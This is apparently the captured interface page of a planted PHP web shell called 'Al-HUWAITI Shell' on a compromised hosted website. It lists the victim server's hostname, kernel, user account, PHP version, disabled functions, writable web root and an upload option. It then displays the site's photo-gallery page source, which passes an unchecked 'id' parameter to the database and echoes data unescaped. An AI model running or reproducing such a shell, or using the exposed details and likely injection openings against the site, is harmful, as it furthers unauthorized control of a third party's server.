Al-HUWAITI Shell
Al-huwaiti


Server : Apache
System : Linux server.xvl.jdw.mybluehostin.me 5.14.0-611.42.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 24 05:30:20 EDT 2026 x86_64
User : pigugusurya ( 1113)
PHP Version : 8.2.30
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/pigugusurya/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/pigugusurya/public_html/photogallery-details.php
<?php
include "config.php";


$id = $_GET['id'];
$gallery_info = $db->selectRow('photo_gallery', '*', $id);
$photos = $db->select('gallery', '*', array('gallery_type'=>'Photo Gallery','pid'=>$id));
?>
<!DOCTYPE html>
<html>
<head>
	<title><?php echo $settings->name; ?></title>
	<!--/tags -->
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<meta name="keywords" content="" />
	<script type="application/x-javascript">
		addEventListener("load", function () {
			setTimeout(hideURLbar, 0);
		}, false);

		function hideURLbar() {
			window.scrollTo(0, 1);
		}
	</script>
	<!--//tags -->
	<link rel="stylesheet" href="css/font-awesome.css">
		<link rel="stylesheet" href="css/sky-mega-menu.css"> 
        <link rel="stylesheet" href="css/demo.css">
	<link href="css/bootstrap.min.css" rel="stylesheet" type="text/css" media="all" />
	<link href="css/style.css" rel="stylesheet" type="text/css" media="all" />
	<link href="css/font-awesome.css" rel="stylesheet">
    <link href="css/style2.css" rel="stylesheet">
	
	<!-- //for bootstrap working -->
	<link href="//fonts.googleapis.com/css?family=Work+Sans:200,300,400,500,600,700" rel="stylesheet">

  <script src="js/jquery.min.js"></script>
  <script src="js/popper.min.js"></script>
  <script src="js/bootstrap.min.js"></script>
  <link rel='stylesheet' href='https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.6/dist/jquery.fancybox.min.css'>

	<style>
table, table td, table th { border:1px solid #ddd; padding:6px;}
table>tbody>tr:nth-of-type(odd) {
	background-color: #f9f9f9
}

table tr:nth-of-type(1) {
	background-color: #eee;
}

table td h5,table th h5 {
  color:#990000;
  font-weight:bold;
  font-size: 16px;
  padding: 10px;
}
</style>	
</head>

<body style="background-color: #ffeee6">
	<?php include("includes/header.php"); ?>
		

  
	<div class="row">
		<div class="col-xl-3"  >
       <?php include("includes/media-menu.php"); ?>
		</div>	
		
			
		


					<!--/.navbar-->
				
	<br><br><style type="text/css">
	ul{
		margin-left: 25px;
	}
	ul li{
		padding: 10px;
	}
</style>
		<div class="col-xl-9" style="font-size: 16px">
			
				<!-- banner -->	
				<br>	
							<!--Card system-->
					<div class="row">
					 		<div class="col-md-12">
					              <div class="card border-left-success shadow h-100 py-2">
					                <div class="card-body">
					                  <div class="row no-gutters align-items-center">
					                    <div class="col mr-2">
					                      <h4 style="text-transform: uppercase "> <?php echo $gallery_info->title; ?> </h4>
												        <hr id="line">
					                    </div>
					                    
					                  </div>
					                  <!-- Department Profile -->
					                  
					                
					                  
					                  	<div class="row" style="font-size:14px; padding:15px;">
					                  	
										<?php
										if(count($photos) != 0){
											foreach($photos as $photo){
										?>
										<div style="float:left; width:310px; height:170px; padding:5px; border:solid 1px #ddd; margin:5px;">
										<a href="<?php echo $admin_url.$photo->image; ?>" data-fancybox="images">
				<img src="<?php echo $admin_url.$photo->image; ?>" width="300" height="160">
				</a>
										</div>
										<?php
											}
										}
										?>
					                  
					                  </div>
					                  
					                  
                        
					              </div>
					            </div>
					        </div>
					               
					</div>
					
					         
		</div>	
</div>		
</div>
			
			
	<?php include("includes/footer.php"); ?>

<!-- modal -->
	
	<!-- //modal -->

	<a href="#home" class="scroll" id="toTop" style="display: block;"> <span id="toTopHover" style="opacity: 1;"> </span></a>
	<!-- js -->
	<script type="text/javascript" src="js/jquery-2.1.4.min.js"></script>

	<script type="text/javascript" src="js/bootstrap.js"></script>
	<!-- stats -->
	<script>
		$('.counter').countUp();
	</script>
	<!-- //stats -->
	<!-- owl carousel -->
	
	
	<!-- //owl carousel -->

	<script src='https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.6/dist/jquery.fancybox.min.js'></script>
</body>

</html>

Al-HUWAITI Shell